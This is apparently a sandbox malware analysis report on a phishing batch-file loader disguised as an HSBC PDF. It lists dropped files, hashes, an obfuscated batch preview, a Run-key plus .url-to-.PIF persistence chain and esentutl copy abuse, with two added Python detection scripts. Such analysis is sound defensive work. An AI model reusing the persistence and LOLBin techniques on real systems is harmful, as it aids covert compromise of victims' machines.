                                                                                      Category:dropped
                                                                                      Size (bytes):2453506
                                                                                      Entropy (8bit):3.938076976548238
                                                                                      Encrypted:false
                                                                                      SSDEEP:24576:qY0nR4W5uffud/O4YVZnLfT8NI1dMPKLcAuaX3DucoDZxTM404oE4AeBIkFZy1zv:W
                                                                                      MD5:F4D3D158E042B2F2F6241C94DA2370FB
                                                                                      SHA1:0228ECE140A699A52E806AD7A977ED2A1198035E
                                                                                      SHA-256:28CD0F0300EB2AFA9B4AB00193F0D5868CA091E361E4853CC48EC225B1A87E17
                                                                                      SHA-512:A97FFFA538DF6C53B2E3C7F594BB46FBDFBC213EACF86BDED4D4080FAC0CA4EEA7EC1CCC6DDBE6037F65F8F1138AD296E1112E48A3074F29564AF7E447DDFE9E
                                                                                      Malicious:false
Preview:
                                                                                      Process:C:\Users\Public\Libraries\AnyDesk.PIF
                                                                                      File Type:MS Windows 95 Internet shortcut text (URL=<file:"C:\\Users\\Public\\Libraries\\Faogvkgh.PIF">), ASCII text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):104
                                                                                      Entropy (8bit):5.189522142085639
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:HRAbABGQYmTWAX+rSF55i0XMcKmYjSsbxUcy49Svn:HRYFVmTWDyzOcExUcbcn
                                                                                      MD5:C37272C81C94DBD1EA2F5546FF4FBA8F
                                                                                      SHA1:1656F74833690F14275BC46513B225FE9639CA21
                                                                                      SHA-256:9D2280D9A822D4B78DFAFBAF35A25369AE68F85432DB3867B8AD2925A32FC338
                                                                                      SHA-512:9034F8B6C245334D2B48C83A65DA5E0FA2A9B97FEB96ACEC5FADF2BC2D975ED11F19CAF918A78F802A43E89CD370EEA2A3A6366884C48136E25361C6582DD2FF
                                                                                      Malicious:true
                                                                                      Preview:[InternetShortcut]..URL=file:"C:\\Users\\Public\\Libraries\\Faogvkgh.PIF"..IconIndex=965449..HotKey=71..
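The timeline above records a Run value (HKCU\...\Run\Faogvkgh = C:\Users\Public\Faogvkgh.url) and this dropped file is an Internet shortcut whose URL= line is a file: URL to C:\Users\Public\Libraries\Faogvkgh.PIF. At logon the shell opens the .url, resolves the file: URL and runs the .PIF, which Windows executes as a program regardless of its contents; the autostart entry itself never names an executable. The Python below is an added example, not Joe Sandbox code: it parses a .url body, normalises the file: URL spellings into a Windows path, and reports why the target looks like persistence rather than a bookmark. The embedded sample is reconstructed from the preview with the ".." rendered back to CRLF (it comes out at the reported 104 bytes); the extension and directory heuristics, and the hypothetical assess_run_value check for Run-key data, are this example's own choices.

```python
"""Parse Windows Internet Shortcut (.url) files and judge whether the target
looks like the Run key -> .url -> .PIF persistence chain in this report.
Added example (not Joe Sandbox code); runs offline on the embedded sample."""
import ntpath
import re
from typing import List, Optional
from urllib.parse import unquote, urlparse

# Constructed from the report preview of the dropped shortcut, ".." restored
# to CRLF. Its length matches the 104 bytes the report lists for the file.
SAMPLE_URL_FILE = (
    "[InternetShortcut]\r\n"
    "URL=file:\"C:\\\\Users\\\\Public\\\\Libraries\\\\Faogvkgh.PIF\"\r\n"
    "IconIndex=965449\r\n"
    "HotKey=71\r\n"
)

# Heuristics chosen for this example: extensions the shell runs directly, and
# directories any user can write to (persistence there needs no admin rights).
EXECUTABLE_EXTS = {".pif", ".scr", ".com", ".exe", ".bat", ".cmd",
                   ".vbs", ".js", ".jse", ".wsf", ".hta", ".ps1"}
USER_WRITABLE_PREFIXES = ("c:\\users\\public\\", "c:\\programdata\\",
                          "c:\\windows\\temp\\")


def shortcut_url(text: str) -> Optional[str]:
    """Return the URL= value of the [InternetShortcut] section, or None."""
    section = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1].lower()
            continue
        key, sep, value = line.partition("=")
        if sep and section == "internetshortcut" and key.strip().lower() == "url":
            return value.strip()
    return None


def file_url_to_path(url: str) -> Optional[str]:
    """Normalise the file: URL spellings seen in .url files to a Windows path.
    Returns None for any other scheme (http:, https:, ...)."""
    if not url.lower().startswith("file:"):
        return None
    rest = url[5:].strip()
    if rest.startswith("//"):
        # file:///C:/dir/x.exe  or  file://server/share/x.exe
        parsed = urlparse(url)
        path = unquote(parsed.path).replace("/", "\\")
        if parsed.netloc:
            return "\\\\" + parsed.netloc + path
        return re.sub(r"^\\(?=[A-Za-z]:)", "", path)
    # file:"C:\\dir\\x.PIF", the spelling in the dropped shortcut: drop the
    # quotes, then collapse the doubled backslashes as Windows path parsing does.
    if len(rest) >= 2 and rest[0] == rest[-1] == '"':
        rest = rest[1:-1]
    rest = unquote(rest).replace("/", "\\")
    if not rest.startswith("\\\\"):
        rest = re.sub(r"\\{2,}", r"\\", rest)
    return rest


def assess_shortcut(text: str) -> dict:
    """Parse a .url body; return its target and the reasons it looks like an
    autostart decoy rather than a bookmark."""
    url = shortcut_url(text)
    target = file_url_to_path(url) if url else None
    findings: List[str] = []
    if url is None:
        findings.append("no URL= entry in [InternetShortcut]")
    elif target is None:
        findings.append("non-file URL: " + url)
    else:
        low = target.lower()
        ext = ntpath.splitext(low)[1]
        if ext in EXECUTABLE_EXTS:
            findings.append("target is executable content (%s)" % ext)
        if low.startswith(USER_WRITABLE_PREFIXES) or "\\appdata\\" in low:
            findings.append("target lives in a user-writable location")
        if low.startswith("\\\\"):
            findings.append("target is a UNC path")
    return {"url": url, "target": target, "findings": findings}


def assess_run_value(name: str, command: str) -> List[str]:
    """Hypothetical check for a Run-key value (name, data) such as
    Faogvkgh = C:\\Users\\Public\\Faogvkgh.url from the timeline."""
    low = command.strip().strip('"').lower()
    findings: List[str] = []
    if ntpath.splitext(low)[1] in (".url", ".lnk"):
        findings.append("autostart via shortcut: real target is one hop away")
    if low.startswith(USER_WRITABLE_PREFIXES):
        findings.append("autostart command in a user-writable location")
    return findings


if __name__ == "__main__":
    print(assess_shortcut(SAMPLE_URL_FILE))
    print(assess_run_value("Faogvkgh", r"C:\Users\Public\Faogvkgh.url"))
```

On a live host the same two functions can be fed the bytes of every *.url under C:\Users and the values of the HKCU and HKLM Run keys; a .url whose target resolves to an executable extension in a world-writable directory is worth pulling for analysis even before the hash is known.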
                                                                                      Process:C:\Users\Public\kn.exe
                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):1226752
                                                                                      Entropy (8bit):7.459058108073001
                                                                                      Encrypted:false
                                                                                      SSDEEP:24576:KdKnJlmwhG7vohKM4br2Qza6HR2zlPQxL/F99UljJes8lSnQ:KCl7kYOLSes8lSQ
                                                                                      MD5:DF6F291F617D9DBAE8F32FB11ECD59C1
                                                                                      SHA1:3D26F65C19079BEA772572E3367B4185AA4C99CA
                                                                                      SHA-256:43223D630E7D3898D254EAF0C02264261ADA01C3ED93FC119C6550E66F406A5B
                                                                                      SHA-512:4065E8C1072B89B6D741F8268DE54DDB5521ACAD91FB13491FC1E1ED75467E753764501E201336C67CD7871B0774B835222C53E9F29DDF4CA72DAC0D37F5F163
                                                                                      Malicious:true
                                                                                      Antivirus:
                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                      • Antivirus: ReversingLabs, Detection: 32%
                                                                                      Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*............................T.............@..........................P...................@...............................%...........................0...g........................... .......................................................text............................... ..`.itext.............................. ..`.data...............................@....bss.....6...........z...................idata...%.......&...z..............@....tls....4................................rdata....... ......................@..@.reloc...g...0...h..................@..B.rsrc...............................@..@.............P......................@..@................................................................................................
                                                                                      Process:C:\Users\Public\Libraries\AnyDesk.PIF
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):826131
                                                                                      Entropy (8bit):7.140714548437426
                                                                                      Encrypted:false
                                                                                      SSDEEP:12288:RaXfzec661p3tuPkVCYvGG1zoHZB3lf+r8O0/LX0qRvHxNnrpEGOFz9cWVAfGWYZ:MXCgp3tzcYoblmazk8RIFBe+Z
                                                                                      MD5:A6B6F0A1C8B5A070E907187DF8E5C944
                                                                                      SHA1:A44F9EAC625D78D04F0A5FAF78C8F41DFF0C0D1D
                                                                                      SHA-256:5AFE8919315B326B9BD21F61CDD7AF5DB8222A721BD6020460E94ECF726B6E5A
                                                                                      SHA-512:E8743932C8B183E5E40512301F3D069919389DD460114D65D30253F9C3A73AD7C656C6003CB63D3CB85A16F44FFE4F6A2FF52E05FB61757C6C1D533A10837449
                                                                                      Malicious:true
                                                                                      Preview:...Y#..K.... ..#...%....."........&#...#......Y#..KQ...#...#.....Y#..Ktiwrhlwelryx.:.NK..[..q..2.!....S.z{fKj..xe...c.....=.M8#..,j.-+\.4}....8.ZRelr.1....7..nZK...,T......r......mj..KI.k.....x..k..p..5_........|.Y=....:......q....C.%...-..u.+...WZ!.6...._"l....,Z.gy.pm....-..LM.RV.........i.........XVxjq.]..tqB...4.r.,h.s....7.$>../.!.;...-.....$V9..T?...?v&.*UAN(.5.).4........NelX...7S.....Y.AV.bR...9.....sw.l..~b.]..t....%j....5V.....j....G..nFY.+.8...2..l...'.5O...T..ui.4v...7...A~..=RLrvsR`....xK..z0.LzBlwe.jU.C.$$].Lb,siyHm.kGg..Qsr.$.OX.Ks...v;$7..z.....zc}.Wt.m....wr.s....G).j{.P[..6..q.T.7...Z..&.ZrRa.]...O.x..<.bN...j.H.TX.'.Ar_.'..QW..F~e6. .5..1.... .F.7...?...1.[Xx..+..6.jq.J.b....$.y^p}.=..h0q..[Xx..q.xas...$?MP..MAK..r.V{.....xYi.wM...E|:..uB...8v7.. =ZY.'.Au...M.KMk.qjcr...m.v.iu...!.7.jXh.O....8.g....q(.7sf.y.s...Q.esm.m..|...rhl.A0.jh.. .6...wrv4qp%jo.xeni..fwrh7.jZ..crp.;.#pu....<...smv.f.Q("xrhl.lq..&..iss5;3...6.+bes<^g...tiw.;..?.mU.qS.."..1
                                                                                      Process:C:\Windows\SysWOW64\esentutl.exe
                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):1226752
                                                                                      Entropy (8bit):7.459058108073001
                                                                                      Encrypted:false
                                                                                      SSDEEP:24576:KdKnJlmwhG7vohKM4br2Qza6HR2zlPQxL/F99UljJes8lSnQ:KCl7kYOLSes8lSQ
                                                                                      MD5:DF6F291F617D9DBAE8F32FB11ECD59C1
                                                                                      SHA1:3D26F65C19079BEA772572E3367B4185AA4C99CA
                                                                                      SHA-256:43223D630E7D3898D254EAF0C02264261ADA01C3ED93FC119C6550E66F406A5B
                                                                                      SHA-512:4065E8C1072B89B6D741F8268DE54DDB5521ACAD91FB13491FC1E1ED75467E753764501E201336C67CD7871B0774B835222C53E9F29DDF4CA72DAC0D37F5F163
                                                                                      Malicious:true
                                                                                      Antivirus:
                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                      • Antivirus: ReversingLabs, Detection: 32%
                                                                                      Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*............................T.............@..........................P...................@...............................%...........................0...g........................... .......................................................text............................... ..`.itext.............................. ..`.data...............................@....bss.....6...........z...................idata...%.......&...z..............@....tls....4................................rdata....... ......................@..@.reloc...g...0...h..................@..B.rsrc...............................@..@.............P......................@..@................................................................................................
                                                                                      Process:C:\Users\Public\Libraries\AnyDesk.PIF
                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):4
                                                                                      Entropy (8bit):2.0
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:Hyn:S
                                                                                      MD5:29637D17C846332CE12493A7842386C6
                                                                                      SHA1:D8C115B7E9D8C11534F51C5E423CED7B4C7B6777
                                                                                      SHA-256:1016D189FFD2702D5EA71FD4EF0EEA4991FE3616A56F8C784D1BBFA3C9201E14
                                                                                      SHA-512:C584E1AA1ACF89E68DA0B32EB11BB5E623975CC84651F01967E8849A1A97671F0A72F33269B35C34CDA0B2742698BA3D878DFDD2CC46B378DFD3E6EAD7FEC318
                                                                                      Malicious:false
                                                                                      Preview:57..
                                                                                      Process:C:\Users\Public\Libraries\AnyDesk.PIF
                                                                                      File Type:DOS batch file, Unicode text, UTF-8 text, with very long lines (324), with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):62357
                                                                                      Entropy (8bit):4.705712327109906
                                                                                      Encrypted:false
                                                                                      SSDEEP:768:KwVRHlxGSbE0l9swi54HlMhhAKHwT6yQZPtQdtyWNd/Ozc:LbeSI0l9swahhhtwT6VytHNdGzc
                                                                                      MD5:B87F096CBC25570329E2BB59FEE57580
                                                                                      SHA1:D281D1BF37B4FB46F90973AFC65EECE3908532B2
                                                                                      SHA-256:D08CCC9B1E3ACC205FE754BAD8416964E9711815E9CEED5E6AF73D8E9035EC9E
                                                                                      SHA-512:72901ADDE38F50CF6D74743C0A546C0FEA8B1CD4A18449048A0758A7593A176FC33AAD1EBFD955775EEFC2B30532BCC18E4F2964B3731B668DD87D94405951F7
                                                                                      Malicious:false
                                                                                      Preview:@echo off..@echo off..@%.......%e%..%c%...%h%.... ...%o%........% %.%o%.....%f%...%f% ........%..s%.%e%.... %t%r.o......% %....%"%.........%l%.......o.%V%......%W%.....o%a%..........%=%.o....%s%. .o%e%. ....... %t%.% %..%"%.r%..%lVWa%"%......%u%. .%p%.%w%.... %u%.... o...%=%..... %=%... . . %"%.%..%lVWa%"%....%R%.%b%. .... %U%. %p%.%z%...%n% ...%n%...%f%..... . ..%W%.......%i%......%%upwu%C%. .. %l%...%o%........%a%......%"% .... %..%lVWa%"% %r%......%M%....%S%...r... ..%o%....... .%w%.....%X%.....rr%I%..... .
                                                                                      Process:C:\Windows\System32\extrac32.exe
                                                                                      File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                      Category:modified
                                                                                      Size (bytes):289792
                                                                                      Entropy (8bit):6.135598950357573
                                                                                      Encrypted:false
                                                                                      SSDEEP:6144:k4WA1B9BxDfQWKORSqY4zOcmpdlc3gJdmtolSm:H1BhkWvSqY4zvmjOwJIT
                                                                                      MD5:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                      SHA1:F1EFB0FDDC156E4C61C5F78A54700E4E7984D55D
                                                                                      SHA-256:B99D61D874728EDC0918CA0EB10EAB93D381E7367E377406E65963366C874450
                                                                                      SHA-512:99E784141193275D4364BA1B8762B07CC150CA3CB7E9AA1D4386BA1FA87E073D0500E61572F8D1B071F2FAA2A51BB123E12D9D07054B59A1A2FD768AD9F24397
                                                                                      Malicious:false
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                      Joe Sandbox View:
                                                                                      • Filename: Ziraat_Bankasi_Swift_Mesaji_BXB04958T.cmd, Detection: malicious, Browse
                                                                                      • Filename: Ziraat_Bankasi_Swift_Mesaji_DXB04958T.cmd, Detection: malicious, Browse
                                                                                      • Filename: #U00c1raj#U00e1nlat k#U00e9r#U00e9s 12#U00b711#U00b72024#U00b7Pdf.cmd, Detection: malicious, Browse
                                                                                      • Filename: #U00c1raj#U00e1nlat k#U00e9r#U00e9s 06.11.2024.cmd, Detection: malicious, Browse
                                                                                      • Filename: TZH3Uk8x45.bat, Detection: malicious, Browse
                                                                                      • Filename: Payment.cmd, Detection: malicious, Browse
                                                                                      • Filename: FACTURA.cmd, Detection: malicious, Browse
                                                                                      • Filename: rPO767575.cmd, Detection: malicious, Browse
                                                                                      • Filename: Contact Form and Delivery Details ,pdf.cmd, Detection: malicious, Browse
                                                                                      • Filename: Duclot Collections.bat, Detection: malicious, Browse
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........OH...&...&...&..V...&..E%...&..E"...&...'../&..E'...&..E#...&..E+...&..E....&..E$...&.Rich..&.................PE..d...S.............".................P..........@.............................p............`.................................................(...................4#...........`......`Z..T............................,...............4...... ........................text............................... ..`.rdata..<.... ......................@..@.data...P...........................@....pdata..4#.......$..................@..@.didat..............................@....rsrc...............................@..@.reloc.......`.......h..............@..B........................................................................................................................................................................................................................
                                                                                      Process:C:\Windows\SysWOW64\esentutl.exe
                                                                                      File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):236544
                                                                                      Entropy (8bit):6.4416694948877025
                                                                                      Encrypted:false
                                                                                      SSDEEP:6144:i4VU52dn+OAdUV0RzCcXkThYrK9qqUtmtime:i4K2B+Ob2h0NXIn
                                                                                      MD5:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                      SHA1:4048488DE6BA4BFEF9EDF103755519F1F762668F
                                                                                      SHA-256:4D89FC34D5F0F9BABD022271C585A9477BF41E834E46B991DEAA0530FDB25E22
                                                                                      SHA-512:80E127EF81752CD50F9EA2D662DC4D3BF8DB8D29680E75FA5FC406CA22CAFA5C4D89EF2EAC65B486413D3CDD57A2C12A1CB75F65D1E312A717D262265736D1C2
                                                                                      Malicious:false
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........+.l.J.?.J.?.J.?.2(?.J.?.!.>.J.?.!.>.J.?.J.?.K.?.!.>.J.?.!.>.J.?.!.>.J.?.!D?.J.?.!.>.J.?Rich.J.?................PE..L....~.............................. k............@..................................j....@.................................................................p...%...5..T............................................................................text............................... ..`.data...8...........................@....idata...$.......&..................@..@.didat..H...........................@....rsrc...............................@..@.reloc...%...p...&...v..............@..B................................................................................................................................................................................................................................................................................
                                                                                      Process:C:\Windows\System32\extrac32.exe
                                                                                      File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                      Category:modified
                                                                                      Size (bytes):1651712
                                                                                      Entropy (8bit):6.144018815244304
                                                                                      Encrypted:false
                                                                                      SSDEEP:24576:MeiElH5YZ5cv6r3HiaZQ8p4XGwiJDgN7MaikGLIsWWi4pT/Y/7hsyDAP760MKR:Me3lZYUvmSu4XTckYD0sWWiwT/MhTzK
                                                                                      MD5:F17616EC0522FC5633151F7CAA278CAA
                                                                                      SHA1:79890525360928A674D6AEF11F4EDE31143EEC0D
                                                                                      SHA-256:D252235AA420B91C38BFEEC4F1C3F3434BC853D04635453648B26B2947352889
                                                                                      SHA-512:3ED65172159CD1BCC96B5A0B41D3332DE33A631A167CE8EE8FC43F519BB3E2383A58737A41D25AA694513A68C639F0563A395CD18063975136DE1988094E9EF7
                                                                                      Malicious:false
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......u}{h1..;1..;1..;..;0..;%w.:2..;%w.:*..;%w.:!..;%w.:...;1..;...;%w.:...;%w.;0..;%w.:0..;Rich1..;................PE..d...+. H.........."..................L.........@....................................q.....`.......... ......................................@Q.......`..@........x..............l'..p5..T...........................`(..............x)......XC.......................text............................... ..`.rdata..T...........................@..@.data....&..........................@....pdata...x.......z...|..............@..@.didat.......P......................@....rsrc...@....`......................@..@.reloc..l'.......(..................@..B........................................................................................................................................................................................................................
                                                                                      Process:C:\Windows\SysWOW64\esentutl.exe
                                                                                      File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):18944
                                                                                      Entropy (8bit):5.742964649637377
                                                                                      Encrypted:false
                                                                                      SSDEEP:384:PVhNH/TqNcx+5tTAjtn3bPcPwoeGULZbiWBlWjVw:PVhZXx+5tTetLVohULZJgw
                                                                                      MD5:B3624DD758CCECF93A1226CEF252CA12
                                                                                      SHA1:FCF4DAD8C4AD101504B1BF47CBBDDBAC36B558A7
                                                                                      SHA-256:4AAA74F294C15AEB37ADA8185D0DEAD58BD87276A01A814ABC0C4B40545BF2EF
                                                                                      SHA-512:C613D18511B00FA25FC7B1BDDE10D96DEBB42A99B5AAAB9E9826538D0E229085BB371F0197F6B1086C4F9C605F01E71287FFC5442F701A95D67C232A5F031838
                                                                                      Malicious:false
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......G.[...5]..5]..5]..]'.5]..0\..5]..6\..5]..1\..5]..4]Q.5]..4\..5]..=\..5]...]..5]..7\..5]Rich..5]................PE..L....$Z..................*...2......P4.......@....@..................................c....@...... ..........................`a..|....p.. ...............................T............................................`..\............................text....).......*.................. ..`.data........@......................@....idata.......`.......0..............@..@.rsrc... ....p.......<..............@..@.reloc...............F..............@..B........................................................................................................................................................................................................................................................................................................................
                                                                                      Process:C:\Windows\SysWOW64\SndVol.exe
                                                                                      File Type:JSON data
                                                                                      Category:dropped
                                                                                      Size (bytes):962
                                                                                      Entropy (8bit):5.015105568788186
                                                                                      Encrypted:false
                                                                                      SSDEEP:12:tkluQ+nd6CsGkMyGWKyGXPVGArwY307f7aZHI7GZArpv/mOAaNO+ao9W7iN5zzkk:qluQydRNuKyGX85jvXhNlT3/7AcV9Wro
                                                                                      MD5:8937B63DC0B37E949F38E7874886D999
                                                                                      SHA1:62FD17BF5A029DDD3A5CFB4F5FC9FE83A346FFFC
                                                                                      SHA-256:AB2F31E4512913B1E7F7ACAB4B72D6E741C960D0A482F09EA6F9D96FED842A66
                                                                                      SHA-512:077176C51DC10F155EE08326270C1FE3E6CF36C7ABA75611BDB3CCDA2526D6F0360DBC2FBF4A9963051F0F01658017389FD898980ACF7BB3B29B287F188EE7B9
                                                                                      Malicious:false
                                                                                      Preview:{. "geoplugin_request":"8.46.123.75",. "geoplugin_status":200,. "geoplugin_delay":"1ms",. "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.",. "geoplugin_city":"New York",. "geoplugin_region":"New York",. "geoplugin_regionCode":"NY",. "geoplugin_regionName":"New York",. "geoplugin_areaCode":"",. "geoplugin_dmaCode":"501",. "geoplugin_countryCode":"US",. "geoplugin_countryName":"United States",. "geoplugin_inEU":0,. "geoplugin_euVATrate":false,. "geoplugin_continentCode":"NA",. "geoplugin_continentName":"North America",. "geoplugin_latitude":"40.7123",. "geoplugin_longitude":"-74.0068",. "geoplugin_locationAccuracyRadius":"20",. "geoplugin_timezone":"America\/New_York",. "geoplugin_currencyCode":"USD",. "geoplugin_currencySymbol":"$",. "geoplugin_currencySymbol_UTF8":"$",. "geoplugin_currencyConverter":0.}
                                                                                      Process:C:\Windows\SysWOW64\esentutl.exe
                                                                                      File Type:ASCII text, with CRLF, CR line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):590
                                                                                      Entropy (8bit):4.639478289631588
                                                                                      Encrypted:false
                                                                                      SSDEEP:12:qzBBVmXxTzHeSbZ7u0wxDDDDDDDDjCaY5Da3laYAV/TB8NGNd:iBB0XxTzHp7u0wQakDa1aT/t8Ny
                                                                                      MD5:C3E9AB89188392AEFD277158441EC0ED
                                                                                      SHA1:D53C1AC771827885E201BC5796613C33CB549E17
                                                                                      SHA-256:A22F17B3DDCA46ED068787D1C702FBFA27D5BC94FCF0115A111009A0ED01437F
                                                                                      SHA-512:F3B77D563ED6ACD3C979A1A863FFA8435D5D7AE19D6B03AC3DA07C62D1D6774A7AB6691C53E2FCAAF7E5B61A09D111C11C0AC1C1EAA15EDA3F8332D868F7BD07
                                                                                      Malicious:false
                                                                                      Preview:..Initiating COPY FILE mode..... Source File: C:\Users\Public\Libraries\AnyDesk.PIF...Destination File: C:\\Users\\Public\\Libraries\\Faogvkgh.PIF...... Copy Progress (% complete)...... 0 10 20 30 40 50 60 70 80 90 100... |----|----|----|----|----|----|----|----|----|----|... ..........................................................Total bytes read = 0x12b800 (1226752) (1 MB)....Total bytes written = 0x12c000 (1228800) (1 MB).......Operation completed successfully in 0.140 seconds.....
                                                                                      Process:C:\Windows\SysWOW64\esentutl.exe
                                                                                      File Type:ASCII text, with CRLF, CR line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):561
                                                                                      Entropy (8bit):4.5335248555285315
                                                                                      Encrypted:false
                                                                                      SSDEEP:12:q6p4xTXWIceSbZ7u0wxDDDDDDDDjCaY5B4aYA/4TB8NGNgL:/p4xT5cp7u0wQakB4aV4t8NN
                                                                                      MD5:19171115E3ABA564083635A13C1B6AD9
                                                                                      SHA1:5AE256170731551E0BE5C4B65A195DA524CB3BF6
                                                                                      SHA-256:7714EE431C356DC1BCBD5328E5B052F50FA32CB4FEB5BD9A4D73F06882661584
                                                                                      SHA-512:4578209AD28B6742259256F5FC8AFCC9B440F56B1CE2C84E058E0F05734EE922C512B50C606B7AC659D951CCC24CFB7CA28B0E019217B149137AC19273C35531
                                                                                      Malicious:false
                                                                                      Preview:..Initiating COPY FILE mode..... Source File: C:\\Windows\\System32\\ping.exe...Destination File: C:\\Users\\Public\\xpha.pif...... Copy Progress (% complete)...... 0 10 20 30 40 50 60 70 80 90 100... |----|----|----|----|----|----|----|----|----|----|... ..........................................................Total bytes read = 0x4a00 (18944) (0 MB)....Total bytes written = 0x5000 (20480) (0 MB).......Operation completed successfully in 0.141 seconds.....
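The two esentutl.exe output files above record the loader's use of esentutl as a copy LOLBin: the dropped AnyDesk.PIF is cloned to Faogvkgh.PIF, and the system's ping.exe is cloned to C:\Users\Public\xpha.pif. The following is an added detection example for this report, not Joe Sandbox code and not part of the sample: it parses esentutl COPY FILE output and flags copies whose destination uses a legacy executable extension, lands in the Public folder, or renames a System32/SysWOW64 binary. The log texts are constructed after the previews above (line breaks restored, progress bar dropped) plus one constructed benign copy for contrast; the extension list and folder heuristics are assumptions made for the example.

```python
"""Flag esentutl.exe being used as a file-copy LOLBin.

Added example; not Joe Sandbox code. Log texts are constructed after the
esentutl output previews in the report, plus one constructed benign copy.
Extension list and folder heuristics are assumptions for this example.
"""
import re
from pathlib import PureWindowsPath

ESENTUTL_LOGS = [
    # 1) constructed after the report: loader stage copied under a random name
    "Initiating COPY FILE mode...\r\n"
    "     Source File: C:\\Users\\Public\\Libraries\\AnyDesk.PIF\r\n"
    "Destination File: C:\\\\Users\\\\Public\\\\Libraries\\\\Faogvkgh.PIF\r\n"
    "Total bytes read = 0x12b800 (1226752) (1 MB)\r\n"
    "Operation completed successfully in 0.140 seconds.\r\n",
    # 2) constructed after the report: ping.exe cloned into Public as a .pif
    "Initiating COPY FILE mode...\r\n"
    "     Source File: C:\\\\Windows\\\\System32\\\\ping.exe\r\n"
    "Destination File: C:\\\\Users\\\\Public\\\\xpha.pif\r\n"
    "Total bytes read = 0x4a00 (18944) (0 MB)\r\n"
    "Operation completed successfully in 0.141 seconds.\r\n",
    # 3) constructed benign use: an ESE log file archived elsewhere
    "Initiating COPY FILE mode...\r\n"
    "     Source File: C:\\Backup\\edb00001.log\r\n"
    "Destination File: D:\\Archive\\edb00001.log\r\n"
    "Operation completed successfully in 0.020 seconds.\r\n",
]

# Extensions Windows still executes although they look harmless (assumption)
LEGACY_EXEC_EXT = {".pif", ".com", ".scr"}
SYSTEM_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")
PUBLIC_DIR = "c:\\users\\public\\"


def normalise(path: str) -> str:
    """Collapse the doubled backslashes esentutl echoes back from its argv."""
    return re.sub(r"\\+", r"\\", path.strip())


def parse_copy(text: str):
    """Return (source, destination) from esentutl COPY FILE output, or None."""
    src = dst = None
    for line in text.splitlines():
        line = line.strip()
        if line.startswith("Source File:"):
            src = normalise(line[len("Source File:"):])
        elif line.startswith("Destination File:"):
            dst = normalise(line[len("Destination File:"):])
    if src is None or dst is None:
        return None
    return src, dst


def classify(src: str, dst: str) -> list:
    """Return the reasons a copy looks like LOLBin abuse (empty list = benign)."""
    s, d = PureWindowsPath(src), PureWindowsPath(dst)
    reasons = []
    if d.suffix.lower() in LEGACY_EXEC_EXT:
        reasons.append("legacy_exec_extension")
    if dst.lower().startswith(PUBLIC_DIR):
        reasons.append("public_folder")
    if src.lower().startswith(SYSTEM_DIRS) and s.name.lower() != d.name.lower():
        reasons.append("system_binary_renamed")
    if s.suffix.lower() in {".exe", ".dll"} and s.suffix.lower() != d.suffix.lower():
        reasons.append("extension_changed")
    return reasons


def scan(logs) -> list:
    """Parse every log text and attach the classification to each copy."""
    findings = []
    for text in logs:
        parsed = parse_copy(text)
        if parsed is None:
            continue
        src, dst = parsed
        findings.append({"src": src, "dst": dst, "reasons": classify(src, dst)})
    return findings


if __name__ == "__main__":
    for f in scan(ESENTUTL_LOGS):
        verdict = "SUSPICIOUS" if f["reasons"] else "ok"
        print(f"{verdict:10} {f['src']} -> {f['dst']} {f['reasons']}")
```

In a real deployment the same classification would be applied to the esentutl command line (the `/y <src> /d <dst>` form) from process-creation telemetry rather than to its console output, but the path heuristics are identical.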
                                                                                      File type:Unicode text, UTF-8 text, with very long lines (468), with CRLF line terminators
                                                                                      Entropy (8bit):4.977989942226025
                                                                                      TrID:
                                                                                        File name:USD470900_COPY_800BLHSBC882001.PDF.bat
                                                                                        File size:3'383'372 bytes
                                                                                        MD5:c96743116088d21b52516f16f4866f69
                                                                                        SHA1:9b9d500993f74ed975945419b6a25c03e80d8400
                                                                                        SHA256:58348cc94b984ca026fa0a319b93ac988a394ed3d5ec39c01c47a8e762ebdb16
                                                                                        SHA512:1a7520b8de10e9fb71f18f22287e298f25743a26ea946e71fb3b895bb8679f86986fe2b0ec30a0d7589cd85af404eca27d8ccf2a47f895f9c166c55660a8edd0
                                                                                        SSDEEP:24576:PdLbg3tuCmhfOs2TLie3m0nKaf5ohA87eR4xGVPTXJF7wb2l+qCWuj8lzoQjJpcp:PR03turhfwL8uJFlEoNZHk
